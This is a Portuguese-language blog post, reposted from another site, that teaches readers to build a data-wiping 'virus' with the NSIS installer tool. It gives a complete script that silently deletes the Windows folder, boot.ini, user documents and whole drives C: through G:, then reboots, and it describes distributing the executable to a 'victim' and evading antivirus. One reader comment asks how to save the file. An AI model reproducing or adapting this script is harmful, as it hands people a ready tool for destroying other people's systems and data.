Como criar um vírus.

By Danz [quinta-feira, agosto 28, 2008] Tá lá em

Vou mostrar como fazer um simples programinha devastador, que apaga TUDO do HD. Tanto os arquivos do usuário como as pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque estarão em uso. Mas apagando a maioria e alguns estratégicos, já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).

Apagar arquivos… Sugiro usar o gerador de programas de instalação NSIS (Nullsoft Scriptable Install System). Ele é destinado a desenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um “falso” programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores…

Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função “Delete”, que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.

AVISO: SE FOR COPIAR E COLAR, CERTIFIQUE-SE DE QUE AS ASPAS ESTEJAM RETAS. SE APARECEREM ASPAS INCLINADAS, FRESQUINHAS E BONITINHAS, APAGUE-AS, SUBSTITUINDO POR ASPAS DUPLAS RETAS, NORMALMENTE FICA NA PARTE SUPERIOR DA TECLA ABAIXO DA ESC. SE USAR AS ASPAS ENFEITADAS NO ARQUIVO .NSI, O NSIS DARÁ UM ERRO NA COMPILAÇÃO. ESSE ERA O MOTIVO PELO QUAL MUITOS NÃO CONSEGUIAM COMPILAR. VEJA ESTE COMENTÁRIO QUE POSTEI.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME “APAGADOR_XXX”
!define PRODUCT_VERSION “1.0″
!define PRODUCT_PUBLISHER “HACKER_XXX”

SetCompressor lzma

Name “${PRODUCT_NAME} ${PRODUCT_VERSION}”
OutFile “MeuVirus.exe”
InstallDir “$TEMP”
Icon “${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico”
SilentInstall silent

Section “Sec001″ SEC01
Delete /REBOOTOK “$WINDIR\*.*”
SectionEnd

Section -Post
Reboot
SectionEnd


Salve com a extensão “.nsi”, e escolha “Todos os arquivos”, no campo “Salvar como tipo”. A extensão “.nsi” é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS (”Iniciar > Programas > MakeNSISW (Compiler GUI)”).

DICA: BAIXE AQUI O ARQUIVO .NSI PRONTO, É SÓ COMPILAR!
(Não é o arquivo executável, você pode baixar sossegado(a). É apenas o arquivo de texto pronto. Você pode visualizá-lo no bloco de notas ou abri-no no NSIS, e é bem pequenininho. Ele está configurado para apagar arquivos de todas as unidades, o que conseguir, de forma a limpar pen drives se estiverem plugados na hora da execução. Cuidado, não clique no botão “Test Installer” em um computador com dados importantes.)

Vamos entender esse arquivo… As três primeiras linhas identificam o “programa” que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item “OutFile” é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha “SilentInstall silent” gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção “Sec01″, você deve adicionar as entradas “Delete” que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha “Delete /REBOOTOK “$WINDIR\*.*” apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK “C:\boot.ini”
Delete /REBOOTOK “C:\Meus documentos\*.*”
Delete /REBOOTOK “C:\*.*”
Delete /REBOOTOK “D:\*.*”
Delete /REBOOTOK “E:\*.*”
Delete /REBOOTOK “F:\*.*”
Delete /REBOOTOK “G:\*.*”
Delete /REBOOTOK “C:\Arquivos de programas\*.*”


Adicione o que quiser, arquivos específicos, etc.

A última seção, “Section -Post / Reboot / SectionEnd”, será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando “reboot” reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em “Iniciar > Programas > MakeNSISW (Compiler GUI)”, clique no menu “File > Load script”, localize o arquivo de extensão “.nsi” que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO “TEST INSTALLER”.

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Lembrando que o conteúdo é de responsabilidade de quem está fazendo ele, não do blog fonte.

Fonte: http://www.explorando.viamep.com/2006/08/dica-como-criar-um-vrus.html

comentários

  1. Anônimo

    É o tutorial e bem direto ,so não consegui foi salvar em formato de ´´ nsi `` como faço isso ,; valeu

    12 de maio de 2009 12:30